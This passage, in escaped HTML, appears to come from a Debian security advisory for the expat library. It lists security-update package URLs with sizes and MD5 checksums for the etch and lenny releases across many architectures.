&lt;br&gt;&lt;br&gt;arm architecture (ARM)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_arm.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_arm.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;57250 1b0a1f0cf411bb0d437f3a01e5cd3593
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_arm.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_arm.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 126100 0f0bcf322522ee564f1c006b9172a873
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_arm.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_arm.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;19798 eaea089d8c4d2bfc14ecf7a72f149202
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_arm.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_arm.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;49400 07e75e50c1b7adae634d77763bd5e86e
&lt;br&gt;&lt;br&gt;hppa architecture (HP PA RISC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 149462 2a9bead50733246e3cc1f8b52c283d6c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;22684 44dd6038115624b780f51314b38d1819
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_hppa.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_hppa.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;64792 aa392afb507d07a4eb4061e6368afd04
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;73014 a8317a8f7a03f9aa5561fe43fbbdbcae
&lt;br&gt;&lt;br&gt;i386 architecture (Intel ia32)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;63130 28f26b307f7cb5b133c7d7b0b7f336dc
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;21090 67a8e21213321cf54be9dc58380ce45f
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 129822 4e06399f0079e7608d25430ded374d97
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_i386.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_i386.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;54984 64b2c0654425bd1234f5394efb1e2d69
&lt;br&gt;&lt;br&gt;ia64 architecture (Intel ia64)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_ia64.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_ia64.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;87362 c78054403944437ce5ddfa700ee04532
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 164964 11efdcba7612853f816112c1b99437d0
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;25076 e6f02ab66bde8b7de92ef2d97b60f9c0
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_ia64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_ia64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;95858 fe960e6af68f6e12429ee8eb600d80f9
&lt;br&gt;&lt;br&gt;mips architecture (MIPS (Big Endian))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_mips.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_mips.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;56612 a917e2fe1206a9614fb7b9c04eb88a86
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;21600 fbcd5b817b80aaa9856698d68a6fa455
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 141918 dc95f50a8665aeb063885bc989d1315f
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_mips.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_mips.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;64702 cd4cee2ee2b4cb36d6f822998c5d7d20
&lt;br&gt;&lt;br&gt;powerpc architecture (PowerPC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;22948 50ae9c0fa46faebf9a4eafeb2fb40b9a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_powerpc.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_powerpc.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;59448 4d212532482851f7a463ede5419f1791
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 148146 381b2f1b56ec4b803cf904e0cd58e4ec
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_powerpc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_powerpc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;67650 de0a12471a24bc12da5c7b4cd33bba07
&lt;br&gt;&lt;br&gt;s390 architecture (IBM S/390)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;64906 f480563f4ff6a0f77dbd0a490a973b9d
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_s390.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_s390.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;56770 7854d9f4ce32b1963ede0790b69904d0
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;21420 d039dacbda9db203d23281317a8ddd3c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_s390.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_s390.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 132506 d194bdb366195ba2402999a2cad5aa4d
&lt;br&gt;&lt;br&gt;sparc architecture (Sun SPARC/UltraSPARC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_1.95.8-3.4+etch2_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 128580 39bf980ed2bfd1a5f332b48c5f4b355b
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_sparc.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_sparc.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;51882 84810453c7288687eebcd5822c4525ca
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;59824 b71d2a54edf53c92d97b1faa63930134
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_sparc.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2_sparc.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;20394 7f1bc9c83495ab50c03701e6ef125332
&lt;br&gt;&lt;br&gt;Debian GNU/Linux 5.0 alias lenny (stable)
&lt;br&gt;- -----------------------------------------
&lt;br&gt;&lt;br&gt;Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 446456 ee8b492592568805593f81f8cdf2a04c
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; 1438 556771752cdeb9b854aae0ecd060e1c5
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 133845 424badd53b1147b260c2dfd3b7c5f153
&lt;br&gt;&lt;br&gt;alpha architecture (DEC Alpha)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_alpha.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_alpha.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;62898 289c10af11866f2862eebe1920910969
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 221130 e5c4f3465c09b47b47b2959b44aeed09
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;24628 92666b01407635c4829fc5fea10237b3
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_alpha.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_alpha.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 135844 331e0b3b6c41c716686de6eb7408024d
&lt;br&gt;&lt;br&gt;amd64 architecture (AMD x86_64 (AMD64))
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 223306 6736ebbd46ddb4f03c7731c9ad893d27
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_amd64.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_amd64.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;62810 e8bcc7686a563b52372f1d03b5e39106
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;23898 688c33641259b60883572206e151449a
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_amd64.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_amd64.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 136360 752cdbf7c744780a629272335fa52779
&lt;br&gt;&lt;br&gt;arm architecture (ARM)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_arm.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_arm.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;52720 27a3e489f7ca8ad52bfc076a81348900
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_arm.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_arm.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 203330 63309ffa0125a0ebf1c4d60831a0f365
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_arm.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_arm.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;22108 165b6b7584589a653b5c8f6e2619f020
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_arm.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_arm.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 116164 979ed610597f6e64ae7646e0c93b0d32
&lt;br&gt;&lt;br&gt;armel architecture (ARM EABI)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_armel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_armel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 209090 33d3e6b4e7df0e01ea86a61fbb5b4240
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_armel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_armel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;22362 44191b6e3c34c571089c23710da67d5d
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_armel.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_armel.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;54240 9bade1198036f567e35d8cc6f37312ea
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_armel.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_armel.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 118714 7bcda4ddc2817c8aab259378dc660a0c
&lt;br&gt;&lt;br&gt;hppa architecture (HP PA RISC)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_hppa.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_hppa.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;69456 1ff6cd259068a168fa229abaf71cc985
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-dev_2.0.1-4+lenny2_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 261136 bde3165254c6034c331a54c0560d4fcb
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;24828 bb26c745fbb3e3cd9446cb01cc0ad4e7
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_hppa.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1_2.0.1-4+lenny2_hppa.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 148662 f955833df5ed41fdedc3d5090a43a8e5
&lt;br&gt;&lt;br&gt;i386 architecture (Intel ia32)
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_i386.udeb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_2.0.1-4+lenny2_i386.udeb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;60816 009c3b55eeeaa87476ff658c5c654791
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_i386.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/e/expat/expat_2.0.1-4+lenny2_i386.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;23288 529f392c091e9e09f74e21e77da69f0c
